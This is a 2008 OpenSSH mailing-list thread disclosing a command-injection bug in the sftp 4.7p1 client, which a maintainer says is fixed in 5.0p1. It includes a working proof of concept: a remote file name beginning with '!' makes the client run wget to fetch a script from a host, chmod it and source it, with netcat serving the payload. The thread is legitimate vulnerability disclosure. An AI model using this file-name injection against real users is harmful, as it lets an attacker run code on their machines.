Strange sftp input parameter handling, user assisted code execution?
Roman Fiedler
roman.fiedler at telbiomed.at
Wed Jun 18 17:23:09 EST 2008
Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>
>>> Hello list,
>>>
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>>
>>> sftp> get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
>
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
>
> -d
Thats good. I was just confused that the ! did also work for the
arguments and not only in front of a command (!get). I just did not
think that copy/pasting a remote filename to a get could cause this
behavior.
I looked at it a little bit closer and found that only direct copy and
paste of filenames from "ls" output can be harmful, no problem with mget *.
lg roman
PS: You were correct that the /bin/bash test did not work, that was a
mistake during testing, but other testcase works:
Server:
cd Tmp
touch '!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds'
nc -vnlp 1234
When connected send:
HTTP/1.1 200 OK
Content-Length: 60
echo "This output is from remote command!"
# padding ................................
Client:
sftp> cd Tmp
sftp> ls
!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
sftp> get !wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
--09:09:32-- http://10.255.255.2:1234/
=> `cmds'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70
100%[====================================>] 70 --.--K/s
09:09:36 (102.05 KB/s) - `cmds' saved [70/70]
This output is from remote command!
sftp>
(The wget line is splitted across lines, in mail client, make sure to
have one line in test).
More information about the openssh-unix-dev
mailing list